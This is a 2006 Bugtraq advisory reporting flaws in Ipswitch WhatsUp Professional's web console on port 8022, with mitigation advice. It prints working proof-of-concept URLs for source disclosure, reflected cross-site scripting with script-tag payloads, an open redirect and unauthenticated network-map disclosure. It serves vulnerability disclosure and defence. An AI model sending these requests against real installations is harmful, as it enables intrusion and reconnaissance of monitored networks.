Ipswitch WhatsUp Professional multiple flaws

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ipswitch WhatsUp Professional multiple flaws
From: "David Maciejak" <david.maciejak@xxxxxxxxx>
Date: Fri, 12 May 2006 00:10:40 +0200
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=MuJWMRQWJTLBDEye7/9yiqdk6gwcRFHbuYgF++nnoAuD215yAk2Rpol3JRS1pRU8qE+JQS5QUsszgZf8oYQE6xd3likwGT6tBZ9JL/wTpZGYdH0g+rLVX1dK3hqDwZoxx16zvtr1LiqOGEVYukclzLsdW6WkbOJnGgTj0UknLqQ=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

WhatsUp is a tool from Ipswitch to monitor application and network,
embedding a custom web server on port 8022.

Description:

This custom web server is prone to multiple flaws.

-as authenticated user:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*there are many XSS flaws, as
http://server:8022/NmConsole/Navigation.asp?sDeviceView=<SCRIPT>alert("me");</SCRIPT>&nDeviceID=<SCRIPT>alert("me");</SCRIPT>
http://server:8022/NmConsole/ToolResults.asp?bIsIE=true&nToolType=0&sHostname=%3cscript%3ealert('me')%3c/script%3e&nTimeout=2000&nCount=1&nSize=32&btnPing=Ping

*redirection
http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.asp&sCancelURL=http://www.google.fr

-not being authenticated:

*src disclosure
http://server:8022/NmConsole/Login.asp.

*network nodes information disclosure (name, internal addr, service)
http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0



The weaknesses have been confirmed in version 2006, source disclosure
in version 2005 and 2005 SP1 too.
Other versions may also be affected.

No response from vendor.

Solution:
-Filtered TCP port 8022, ask a patch from vendor if you are a registered user
-Keep an eye on an opensource project: http://gnms.rubyforge.org


David Maciejak

Prev by Date: Re: Firefox 1.5.0.3 - DoS
Next by Date: Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors
Previous by thread: Dovecot IMAP: Mailbox names list disclosure with mboxes
Next by thread: Several flaws in e-business designer (eBD)
Index(es):
- Date
- Thread